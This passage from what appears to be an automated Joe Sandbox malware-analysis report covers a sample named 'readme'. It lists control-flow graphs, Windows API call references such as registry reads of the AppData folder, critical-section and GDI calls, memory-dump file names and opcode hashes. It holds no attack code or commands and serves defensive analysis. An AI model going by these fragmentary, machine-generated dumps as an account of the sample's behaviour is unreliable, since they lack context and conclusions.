                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3087884050-0
                                                                                                                                                                                                          • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                          • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 730 4cfe40-4cfe62 731 4cfe68-4cfe6d call 497d20 730->731 732 4cffe0-4cfffd RegOpenKeyExA 730->732 741 4cfe6f call 4cb0e0 731->741 734 4cffff-4d002b RegQueryValueExA 732->734 735 4d0049-4d0059 732->735 736 4d002d-4d0039 call 435020 734->736 737 4d003e-4d0042 734->737 736->737 740 4d0043 RegCloseKey 737->740 740->735 742 4cfe74-4cfe76 741->742 743 4cfe7c-4cfe99 RegOpenKeyExW 742->743 744 4cff3f-4cff5c RegOpenKeyExA 742->744 743->735 746 4cfe9f-4cfecb RegQueryValueExW 743->746 744->735 745 4cff62-4cff8e RegQueryValueExA 744->745 747 4cffd9-4cffde 745->747 748 4cff90-4cff93 745->748 746->737 749 4cfed1-4cfee3 call 4b8350 746->749 747->740 750 4cffc8-4cffd4 call 435020 748->750 751 4cff95-4cffa9 call 4b8440 748->751 749->737 756 4cfee9-4cfeec 749->756 750->747 751->747 760 4cffab-4cffc6 call 435020 call 439d00 751->760 758 4cfeee-4cff04 call 435020 call 439d00 756->758 759 4cff09-4cff1e call 4d9d70 call 439d00 756->759 758->737 759->737 773 4cff24-4cff3a call 435020 call 439d00 759->773 760->740 773->737
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFE8F
                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFEC1
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFF52
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFF84
                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFFF3
                                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004D0021
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004D0043
                                                                                                                                                                                                            • Part of subcall function 004CB0E0: GetVersionExA.KERNEL32 ref: 004CB0FB
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: OpenQueryValue$CloseVersion
                                                                                                                                                                                                          • String ID: AppData$AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                          • API String ID: 3944000476-502054578
                                                                                                                                                                                                          • Opcode ID: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                          • Instruction ID: f72081d33d1e3e5e856db847e9c33e0e25e3821136d69a0383b26c3c547fa845
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db32938d79705165cc268b6cef819a2b1932c4d39244d564a2eda060a3e5bcd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151B2715087017BC725DB50EC95FAB73E8AF88754F00891EF98553381EAB9D80AC7AA

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 949 4f5fc0-4f5fd7 950 4f5fdd-4f5ff0 call 4f5cb0 949->950 951 4f6093-4f6095 949->951 963 4f605d-4f6065 950->963 964 4f5ff2-4f6058 call 4fe010 950->964 953 4f60f7-4f60f9 951->953 954 4f6097-4f609f 951->954 956 4f60ff-4f6101 953->956 957 4f61a1 953->957 958 4f60b2-4f60ba 954->958 959 4f60a1-4f60a6 954->959 961 4f62e5-4f62ec 956->961 965 4f6107-4f6148 EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection call 4f2bf0 956->965 960 4f61a7-4f61a9 957->960 957->961 958->953 962 4f60bc-4f60be 958->962 959->958 966 4f60a8-4f60b0 959->966 960->961 967 4f61af-4f61c2 call 4f24f0 960->967 968 4f60d3 962->968 969 4f60c0-4f60c5 962->969 963->951 971 4f6067-4f607c EnterCriticalSection 963->971 964->963 980 4f614a 965->980 981 4f6167-4f6174 call 4f2bf0 965->981 966->958 966->962 983 4f624e-4f625b call 4f24f0 967->983 984 4f61c8-4f61ce 967->984 975 4f60d9-4f60f2 call 4e5ec0 968->975 969->968 974 4f60c7-4f60d1 969->974 976 4f607e 971->976 977 4f6085-4f608d LeaveCriticalSection 971->977 974->968 974->975 975->953 976->977 977->951 982 4f6150-4f6165 call 4f3d00 call 4f2bf0 980->982 981->961 997 4f617a 981->997 982->981 983->961 998 4f6261 983->998 989 4f61d0-4f61df EnterCriticalSection 984->989 994 4f61e6-4f61ef 989->994 995 4f61e1 989->995 1000 4f6201-4f620a 994->1000 1001 4f61f1-4f61ff 994->1001 995->994 1002 4f6180-4f6195 call 4f3d00 call 4f2bf0 997->1002 1003 4f6267-4f6276 EnterCriticalSection 998->1003 1005 4f6211-4f622b LeaveCriticalSection EnterCriticalSection 1000->1005 1001->1005 1021 4f6197-4f619e 1002->1021 1007 4f627d-4f6286 1003->1007 1008 4f6278 1003->1008 1009 4f622d-4f6233 1005->1009 1010 4f6240-4f624c LeaveCriticalSection 1005->1010 1012 4f6298-4f62a1 1007->1012 1013 4f6288-4f6296 1007->1013 1008->1007 1014 4f623a-4f623d 1009->1014 1015 4f6235-4f6238 1009->1015 1010->983 1010->989 1017 4f62a8-4f62c2 LeaveCriticalSection EnterCriticalSection 1012->1017 1013->1017 1014->1010 1015->1010 1019 4f62d7-4f62e3 LeaveCriticalSection 1017->1019 1020 4f62c4-4f62ca 1017->1020 1019->961 1019->1003 1022 4f62cc-4f62cf 1020->1022 1023 4f62d1-4f62d4 1020->1023 1022->1019 1023->1019
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F606E
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F608D
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6111
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F611B
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F612B
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6135
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5FEB,?,00000000,?,?,00000000,?), ref: 004F5CC0
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CCE
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F5CDE
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D07
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: EnterCriticalSection.KERNEL32(?), ref: 004F5D48
                                                                                                                                                                                                            • Part of subcall function 004F5CB0: LeaveCriticalSection.KERNEL32(?), ref: 004F5D56
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F61D1
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6212
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F621C
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F6244
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000001,00000002,?,?,00000000,?,?,?,?,?,?,004F732F,?), ref: 004F6268
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62A9
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62B3
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,004F732F,?), ref: 004F62DB
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                          • Opcode ID: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                          • Instruction ID: 143f1fb28292c6c8f5848ec82d72cb0c1768edffe3cb57bca7300ec5568bca4f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e8666cb07b5cacadf35492099d50c0e827f2b9a1fadfb76ea06a7d0beb11ddf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AA1113020430E8BC725DF349854BBBBBB9AF94304F15056EFA5687382DB79E809CB65
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • StartDocA.GDI32(?,00000000), ref: 004D7F29
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,00000008), ref: 004D7F47
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(?,0000000A), ref: 004D7F55
                                                                                                                                                                                                          • LPtoDP.GDI32(00000000,00000002), ref: 004D7F83
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006E), ref: 004D7FA0
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000006F), ref: 004D7FAE
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 004D7FBC
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004D7FD2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsDevice$Start
                                                                                                                                                                                                          • String ID: portrait
                                                                                                                                                                                                          • API String ID: 1738886688-2504013051
                                                                                                                                                                                                          • Opcode ID: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                          • Instruction ID: 78bfa520cedcb1c13f518f393ea8421dc938ea51f70754ce75912898c89e0c82
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87bb50d4ff0b2b6bcd955025618aa84fe9db738b10e38e5fb2dd326402729996
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7641DFB0604B109FC324DF2AD980A1AFBF5BF98710F108A1EE58A877A1D771E845CF91
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00000000,?,004AC0BD,?,?), ref: 004F705A
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F7081
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 004F709A
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F70A3
                                                                                                                                                                                                          • timeGetTime.WINMM(00000000,00000000,00000000,00000000,?), ref: 004F7390
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?), ref: 004F73D5
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$Leave$Enter$Timetime
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4022644143-0
                                                                                                                                                                                                          • Opcode ID: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                          • Instruction ID: 3d57daaa4b40982c2e4bbac1192c2a7fdd3e5fb289d79a2cbb097eeb1d58369f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 619e67b58965c9b6edfd0f45f913366b2bb88d2215bcce8f286a8ccc74bc94e1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60A12B303083495BC7259F398890BBBBBE59F85700F04456EFA9AC7392DB6CE905D768
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,00000000,004F7352,?), ref: 004F2A19
                                                                                                                                                                                                          • timeGetTime.WINMM ref: 004F2A25
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2A39
                                                                                                                                                                                                          • timeGetTime.WINMM(?), ref: 004F2A46
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F2AD7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000013.00000002.1647792820.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000555000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648206720.0000000000562000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648296468.0000000000628000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648616432.0000000000674000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648825942.00000000006E7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648854998.00000000006EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648894935.00000000006F5000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1648929772.00000000006F9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649027493.0000000000700000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649055213.0000000000703000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649089510.0000000000709000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649214680.000000000070E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649309849.000000000073C000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000013.00000002.1649361299.000000000073F000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_19_2_400000_readme.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CriticalSection$LeaveTimetime$Enter
                                                                                                                                                                                                          • String ID: NetStream.Buffer.Empty$NetStream.Buffer.Full$status
                                                                                                                                                                                                          • API String ID: 2943255653-4242577526
                                                                                                                                                                                                          • Opcode ID: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                          • Instruction ID: adfbc573f46a5ae42de3eb127535f59d6c3a8125dfae6686c248f3bcdabba04f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2800b6424f4894067f550383054d91bd5e105dc9488e734664937b715ac8d418
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33217471740705ABD7308F14DD86B6BB7A4FB50B21F24462BF267966D0C7B4B8408754
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,004F5B64,00000002), ref: 004F3ED0
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3EDE
                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 004F3F20
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000013.00000002.1647845801.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
